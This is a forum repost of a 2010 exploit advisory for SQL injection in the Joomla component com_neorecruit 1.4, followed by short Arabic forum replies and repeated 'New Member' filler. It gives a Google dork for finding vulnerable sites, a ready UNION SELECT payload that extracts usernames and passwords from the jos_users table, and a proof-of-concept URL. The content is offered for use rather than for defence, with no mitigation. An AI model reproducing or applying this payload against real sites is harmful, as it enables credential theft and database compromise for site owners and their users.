__ ((_)((_)/(_))___ ((_)\ _ )\ )\___)\ _ )\(_))(_))_ ((_)(_))(_)) (_))  _((_)_ ((_)
\ \ / / _ (_)) __\ \ / (_)_\(_)(/ __(_)_\(_) _ \|   \| __| _ \ |  |_ _|| \| | |/ /
 \ V / (_) || (_ |\ V / / _ \  | (__ / _ \ |   /| |) | _||   / |__ | | | .` | ' < 
  |_| \___/  \___| |_| /_/ \_\  \___/_/ \_\|_|_\|___/|___|_|_\____|___||_|\_|_|\_\
                                        .WEB.ID
-----------------------------------------------------------------------
 Joomla Component com_neorecruit 1.4 (id) SQL Injection Vulnerability
-----------------------------------------------------------------------
Author      : v3n0m
Site        : http://yogyacarderlink.web.id/
Date        : August, 07-2010
Location    : Jakarta, Indonesia
Time Zone   : GMT +7:00
----------------------------------------------------------------
 
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~
 
Application : NeoRecruit
Version     : 1.4 Lower versions may also be affected
Vendor      : http://www.neojoomla.com/
Price       : 54,90 €
Google Dork : inurl:com_neorecruit
----------------------------------------------------------------
 
Xploit:
~~~~~~~
 
-9999+union+all+select+1,group_concat(username,char(58),password)v3n0m,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+jos_users--
 
Poc:
~~~~~~~
 
http://127.0.0.1/[path]/index.php?option=com_neorecruit&task=offer_view&id=[SQLi]
 
----------------------------------------------------------------
 
WWW.YOGYACARDERLINK.WEB.ID | v3n0m666[at]live[dot]com
 
---------------------------[EOF]--------------------------------

KALASH3R · 10 أغسطس 2010

يعطيك العافية

بارك الله فيك

Master vbspiders · 10 أغسطس 2010

[align=center]KALASH3R
لا اريد ردود حانبية
تحياتي[/align]

الـسـلام عـلـيكـم ::مملكة ثغرات حقن قواعد البيانات:: ::متجدد بأذن الله:: ------------------------- البعض ما بيعرف يستغل الثغرات في مواقع...

New Member

New Member

New Member

New Member

New Member

New Member

New Member

New Member

New Member

New Member

New Member

New Member

New Member

New Member

New Member

New Member

New Member

New Member

New Member

New Member